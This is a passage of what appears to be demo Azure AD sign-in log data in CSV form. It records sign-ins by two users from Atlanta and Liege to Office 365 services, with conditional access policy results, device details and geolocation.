{'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",5f11d930-41ca-43a7-b362-f3ce31861000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,5f11d930-41ca-43a7-b362-f3ce31861000,SigninLogs,Sucess,33.7984581,-84.38828278
+2019,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:32.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,35e24081-265c-48f8-a028-d8f6f08253dd,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",88812ca6-4188-4e59-83ab-d71d00f81000,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,88812ca6-4188-4e59-83ab-d71d00f81000,SigninLogs,Sucess,50.6406517,5.572050095
+2020,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,55:40.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5374abba-89aa-4501-9fe6-5fbdfae62cee,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 14:55,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",03932e54-fdb0-4c07-8405-8b9e4a541200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,03932e54-fdb0-4c07-8405-8b9e4a541200,SigninLogs,Sucess,33.7984581,-84.38828278
+2021,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,57:01.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,477fe157-e63b-449c-93f6-3b6334f04061,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 14:57,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",41b70c69-9711-4381-8dc3-5fd66b941000,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,41b70c69-9711-4381-8dc3-5fd66b941000,SigninLogs,Sucess,33.7984581,-84.38828278
+2022,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:16.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1b57aee4-5a35-498d-99c5-445bb33865ac,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c3a7ae11-3090-46d7-95b6-d20567201200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c3a7ae11-3090-46d7-95b6-d20567201200,SigninLogs,Sucess,33.7984581,-84.38828278
+2023,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,14:14.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,81b36886-9f95-4d05-a1ed-54c9784e54b6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,CRM Power BI Integration,e64aa8bc-8eb4-40e2-898b-cf261a25954f,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 15:14,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",8d371308-4e1f-476f-97d6-c0eac5631200,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft People Cards Service,8d371308-4e1f-476f-97d6-c0eac5631200,SigninLogs,Sucess,50.6406517,5.572050095
+2024,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:28.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8b935e57-fec1-41c6-a890-977e4617a597,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f84b0ab1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,OfficeClientService,ec85dd07-c5e8-494c-aa5b-3f84b0ab1100,SigninLogs,Sucess,33.7984581,-84.38828278
+2025,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:38.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f21e73fe-8173-4436-ae8c-f77c62e1c9cc,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office 365 Portal,00000006-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f8419ad1100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ec85dd07-c5e8-494c-aa5b-3f8419ad1100,SigninLogs,Sucess,33.7984581,-84.38828278
